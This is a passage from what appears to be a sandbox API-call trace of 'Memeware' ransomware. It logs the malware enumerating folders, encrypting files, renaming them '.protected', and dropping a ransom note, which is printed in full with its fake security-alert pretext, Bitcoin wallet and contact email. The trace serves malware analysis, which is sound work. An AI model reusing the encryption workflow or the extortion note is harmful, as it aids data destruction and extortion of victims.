hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.737] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.737] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.738] CloseHandle (hObject=0x164) returned 1 [0078.738] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.738] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0078.738] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0078.738] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0078.738] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0078.738] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0078.738] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned 141 [0078.738] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0078.738] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0078.738] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*") returned 143 [0078.738] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.738] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.738] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.738] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.738] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.738] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.738] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\.") returned 143 [0078.738] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.738] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.738] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.738] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.738] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.738] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.738] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.738] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\..") returned 144 [0078.738] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.739] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.739] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.739] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.739] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.739] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.739] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.739] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.739] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") 
returned 155 [0078.739] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.739] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.739] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.739] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.739] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0078.739] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.739] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0078.739] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.739] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0078.739] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.739] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0078.740] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.740] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0078.740] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.740] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.740] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.740] CloseHandle (hObject=0x168) returned 1 [0078.740] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.protected") returned 165 [0078.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json.protected")) returned 1 [0078.741] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.741] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.741] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\RESTORE_FILES.txt") returned 159 [0078.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.741] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.741] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.742] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.742] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.742] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.742] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.742] CloseHandle (hObject=0x164) returned 1 [0078.742] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.742] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0078.742] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0078.742] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0078.742] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0078.742] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0078.742] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned 141 [0078.743] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0078.743] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0078.743] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*") returned 143 [0078.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.743] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.743] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.743] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.743] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.743] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.743] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\.") returned 143 [0078.743] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.743] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.743] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.743] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.744] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.744] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.744] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.744] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\..") returned 144 [0078.744] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.744] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.744] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.744] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0078.744] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.744] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.744] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.744] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.744] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0078.744] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.744] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.744] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.744] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0078.744] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0078.744] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0078.744] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.744] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0078.745] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.745] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0078.745] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.745] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.746] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.746] CloseHandle (hObject=0x168) returned 1 [0078.746] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.protected") returned 165 [0078.746] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json.protected")) returned 1 [0078.746] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.746] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.746] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\RESTORE_FILES.txt") returned 159 [0078.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.747] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.747] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.747] lstrlenA (lpString="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") returned 684 [0078.747] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.748] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.748] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.748] CloseHandle (hObject=0x164) returned 1 [0078.748] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.748] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0078.748] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0078.748] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0078.748] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0078.748] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0078.748] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned 141 [0078.748] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0078.748] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0078.748] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, 